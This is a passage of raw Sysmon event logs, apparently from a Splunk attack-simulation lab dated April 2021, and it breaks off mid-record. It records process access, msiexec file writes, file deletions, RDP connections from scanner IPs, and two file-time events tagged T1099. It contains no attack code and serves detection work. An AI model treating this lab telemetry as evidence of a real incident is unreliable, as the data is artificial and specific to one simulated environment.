14:56:00.169{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049936Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.169{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EB80-607E-E106-00000000BB01}3984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049935Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.169{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB80-607E-E106-00000000BB01}3984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049934Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.170{85C0FFC9-EB80-607E-E106-00000000BB01}3984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000072370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:01.985{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\OAISTCTE\Microsoft.Office.interop.access.dao.dll2021-04-20 14:56:01.985 11241100x800000000000000072369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:01.985{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\N722NT5E\Policy.11.0.Microsoft.Office.Interop.Access.dll2021-04-20 14:56:01.985 11241100x800000000000000072368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:01.954{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\CZDPFT1T\Microsoft.Office.Interop.Access.dll2021-04-20 14:56:01.954 11241100x800000000000000072367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:01.954{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\JDQXU2Y3\Policy.14.0.Microsoft.Office.Interop.Access.dll2021-04-20 14:56:01.954 11241100x800000000000000072366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:01.938{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\O0OKHXBE\Policy.12.0.Microsoft.Office.Interop.Access.dll2021-04-20 14:56:01.938 23542300x800000000000000072365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:01.766{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d0828c.rbsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:01.766{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF0A8681C918734758.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000072363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:01.766{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF830FDC1688A53EC2.TMPMD5=B3F7231D990E9A11ACBAE66F0CBBF569,SHA256=664590109A9E037830A96692F89409EE4D94F9E0C9C3D87B4F8BFACD502873B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000072362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:00.348{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com62359-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:00.210{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57515-false10.0.1.12-8000- 354300x800000000000000072360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.433{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com62109-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.427{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-8293-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.427{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-5562-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.335{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local60581- 10341000x800000000000000072356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:01.219{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB81-607E-9E0B-00000000BB01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:01.204{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:01.204{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:01.204{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:01.204{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:01.204{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB81-607E-9E0B-00000000BB01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:01.204{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB81-607E-9E0B-00000000BB01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000072349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:01.204{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=DF6E622C426FE50141096107EAA426EA,SHA256=392B2FEA596B98FA738437CC21F99F3D97A81702A18C42BD5AD3F10E4E19FC0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:01.204{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=961847A5C2E8A0C3BFC131690ABDA253,SHA256=2F127EA4608410E0A64153724B0A4C5AFFAAFA13FB03AD9340A8D0504F12792D,IMPHASH=00000000000000000000000000000000falsetrue 154100x800000000000000072347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:01.205{A7A01FEF-EB81-607E-9E0B-00000000BB01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000049951Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:59.486{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com64557-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049950Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:01.576{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=202B33C33C8656A5B5D86CECCA0EE55D,SHA256=7602B1272168567037A676B72242DC270A67F2C72E257E82CCC63567555CFE07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049949Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:01.201{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CFE94863EFF1DC8DF454F5A4192F8745,SHA256=B5B212277816764B7BE3593BBFCE2CCC6AA2FE222C9C8EACBBF0F2ADD38DF987,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000072530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.844{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\J2DEKNPM\Policy.14.0.Microsoft.Office.Interop.Excel.dll2021-04-20 14:56:02.844 11241100x800000000000000072529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.829{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\T1BT9F9B\Policy.12.0.Microsoft.Office.Interop.Excel.dll2021-04-20 14:56:02.829 11241100x800000000000000072528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.829{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\FEQ44SL6\Policy.11.0.Microsoft.Office.Interop.Word.dll2021-04-20 14:56:02.829 11241100x800000000000000072527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.813{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\INOCMDGU\Microsoft.Office.Interop.Word.dll2021-04-20 14:56:02.813 11241100x800000000000000072526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.813{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\JOUH1PV4\Policy.14.0.Microsoft.Office.Interop.Word.dll2021-04-20 14:56:02.813 11241100x800000000000000072525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.797{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\PB4T6E28\Policy.12.0.Microsoft.Office.Interop.Word.dll2021-04-20 14:56:02.797 11241100x800000000000000072524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.797{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOLoader.dll2021-04-20 14:56:02.797 11241100x800000000000000072523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.797{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOLoader.dll2021-04-20 14:56:02.797 254200x800000000000000072522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10992021-04-20 14:56:02.797{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe2002-02-01 18:02:02.0002021-04-20 14:56:02.797 11241100x800000000000000072521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:56:02.797{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe2021-04-20 14:56:02.797 254200x800000000000000072520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10992021-04-20 14:56:02.782{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe2002-02-01 18:02:02.0002021-04-20 14:56:02.782 11241100x800000000000000072519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:56:02.782{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe2021-04-20 14:56:02.782 11241100x800000000000000072518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.782{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll2021-04-20 14:56:02.782 11241100x800000000000000072517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.782{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Common Files\microsoft shared\VSTO\vstoee.dll2021-04-20 14:56:02.782 10341000x800000000000000072516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.782{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000072515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.782{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.782{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 